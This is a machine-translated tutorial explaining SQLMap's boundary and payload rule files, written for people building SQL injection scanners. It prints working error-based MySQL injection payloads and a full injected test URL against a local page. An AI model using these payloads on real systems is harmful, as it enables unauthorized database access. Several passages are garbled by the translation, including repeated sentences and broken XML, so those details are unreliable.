Cheetah Academy of Sciences, 9/11 15:31

0 x00 preface


When it comes to SQL injection, the first thing that comes to mind is SQLMAP, which is an open source tool for SQL injection detection and utilization. So SQLMap in the scan OF SQL logic exactly how to achieve it, the next discussion of SQLMap scan logic, through the understanding of SQLMap scan logic to create a SQL scan tool of their own.

0x01 SQL Scan Rule:


The SQLMap scan rules file is stored in the \ XML folder, and the SQLMap scan rules file is stored in the \ XML folder. The SQLMap scan rules file is stored in the \ XML folder. The SQLMap scan rules file is stored in the \ XML folder. Subscription. XML and Payloads are the scan rules of SQLMap. \ XML \ Payloads are loads that store different injection methods.

It is necessary to understand two formats: boundary file and payloads.

Example:

#! HTML <boundary> <level>1</level> <clause>1</clause> <where>1,2</where> <ptype>1</ptype> <prefix>'</prefix> <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix> </boundary>Copy the code
  1. Clause and where attribute

    The function of these two elements is to limit the range used by boundary. It can be understood that the boundary can only match the current test if and only when the value of the WHERE node of a boundary element contains the child node of test element and the value of the clause node contains the child node of test element. So it generates payload.

  2. Prefix and suffix attributes

To understand what these two properties do, let’s start with a piece of code.

#! javascript function getattachtablebypid($pid) { $tableid = DB::result_first("SELECT tableid FROM ".DB::table('forum_attachment')." WHERE pid='$pid' LIMIT 1"); return 'forum_attachment_'.($tableid >= 0 && $tableid < 10 ? intval($tableid) : 'unused'); }Copy the code

Select * from pid where pid = ‘AND ‘test’ = ‘test’; select * from PID where PID = ‘test’

#! sql SELECT tableid FROM ".DB::table('forum_attachment')." WHERE pid='' AND 'test' = 'test' LIMIT 1Copy the code

So if we type ‘AND ‘test’ = ‘test’, then the final concatenated SQL statement is also valid. In this way, the Payload tested can be placed between prefix and suffix to make the final SQL valid for injection testing. Therefore, the function of prefix and suffix is to truncate the SQL statement and make the final Payload valid.

The function of the boundary file is explained. Payload is explained.

#! html <test> <title>MySQL &gt; = 5.0 AND error-based-where, HAVING, ORDER BY or GROUP BY clause</title> <stype>2</stype> <level>1</level> <risk>1</risk> <clause>1,2,3</clause> <where>1</where> <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector> <request><! -- These work as good as ELT(), but are longer<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload><payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY  x)a)</payload>--> <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload> </request> <response> <grep>[DELIMITER_START](? P&lt; result&gt; . *?) [DELIMITER_STOP]</grep> </response> <details> <dbms>MySQL</dbms> <dbms_version>&gt; 5.0 < / dbms_version = > < / details > < / test >Copy the code

1 the title attribute

The title attribute is the title of the current test Payload. Based on the title, you can know the current injection method and the database type tested.Copy the code

2 stype properties

This property marks the current injection technique type, 1 for Boolean blind injection and 2 for error injection.Copy the code

3 level attribute

This attribute is used by each test to specify the depth of the SQL test. In simple terms, when performing SQL injection tests using SQLMAP, you need to specify the level of the scan. The default value is 1, and the maximum value is 5. If you specify level5 for injection testing, it is estimated that more than 1000 tests will be performed.Copy the code

4 clause and WHERE attribute

The syntax clause and WHERE attribute in test have the same function as the syntax and WHERE attribute in boundary.Copy the code

5 content attribute

This attribute is both the SQL statement to be tested and the key to the SQLMap scan logic, where [RANDNUM], [DELIMITER_START], and [DELIMITER_STOP] represent random values and characters, respectively. When SQLMap scans, it will replace the corresponding random number, and then splices it with the prefix and suffix of boundary to become the test Payload.Copy the code

6 the details properties

In this example, if the value is MySQL, it indicates that the Payload is applicable to the MySQL database. The dbMS_version subsection represents the applicable database version.Copy the code

7 the response properties

The child nodes under this attribute mark the Payload test method for the current test.

Grep: error injection comparison: Boolean busy injection Time: delayed injection char: joint query injectionCopy the code

The checkSqlInjection function in SQLMAP uses this property as a basis for entering different processing branches. And the value in the response attribute is the basis for SQL injection judgment. For example, in the current example, the value in grep is [DELIMITER_START](? P< result> . *?) [DELIMITER_STOP],SQLMap will replace [DELIMITER_START] and [DELIMITER_STOP] with the corresponding values in the Payload, and then use the obtained data to match the returned page information. If there is a SQL injection vulnerability in the current judgment.

Note that the string Payload is processed according to the type of database for which the current Payload is applied. The code for processing the string is in the syntax. Py script in the database folder of \plugins\ DBMS.

Therefore, the final payload is formed according to the combination of the payload sub-node of test and the values of the prefix and suffix sub-nodes of the boundary, namely: Final payload = URL parameter + boundary.prefix+test.payload+boundary.suffix

0 x02 instance


Payload and boundary can be used as Payload and boundary.

In the above example, the value of the WHERE node in the boundary element is 1,2, and the value of the WHERE node containing the test element (1). In addition, the value of the clause node in the boundary element is 1, and the value of the WHERE node containing the test element (1). Therefore, The boundary and test elements match. The payload of the test element is

#! sql AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)Copy the code

[RANDNUM], [DELIMITER_START], and [DELIMITER_STOP] are replaced with an escape.

The generated payload is similar to the following:

#! sql [RANDNUM] = 2214 [DELIMITER_START] = ~! (0x7e21 after escaping) [DELIMITER_STOP] =! ~(0x217e) Payload: ' AND (SELECT 2214 FROM(SELECT COUNT(*),CONCAT(0x7e21,(SELECT (CASE WHEN (2214=2214) THEN 1 ELSE 0 END)),0x217e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'pujM'='pujMCopy the code

If http://127.0.0.1/search-result.php? Keyword =&ad_id=3 Keyword =&ad_id=3

Duplicate entry '~! 1! ~1' for key 'group_key'Copy the code

Based on the previous explanation, the final URL for the test is as follows

#! SQL http://127.0.0.1/search-result.php? keyword=&ad_id=' AND (SELECT 2214 FROM(SELECT COUNT(*),CONCAT(0x7e21,(SELECT (ELT(2214=2214,1))),0x217e,FLOOR(RAND(0)*2))x FROM information_schema. CHARACTER_SETS GROUP BY x)a) AND 'YmRM'='YmRMCopy the code

The following information is displayed

Then match the current page according to the normal in grep.

#! sql <grep>[DELIMITER_START](? P&lt; result&gt; . *?) [DELIMITER_STOP]</grep>Copy the code

Instead of using the re: ~! (? P

.*?) ! ~ to match Duplicate entry ‘~! 1! The result of ~1′ for key’ group_key’ is 1, which indicates that the current page does have SQL injection.

0 x03 summary


Through the scanning logic of SQLMap, we can understand the conventional methods and implementation of SQL injection. After we are familiar with the configuration file of SQLMap, we can modify the Payload and boundary according to the actual situation. By increasing the Payload and boundary, we can enhance the scanning rules of SQLMap. You can also use its scanning rules to build your own SQL scanning tool.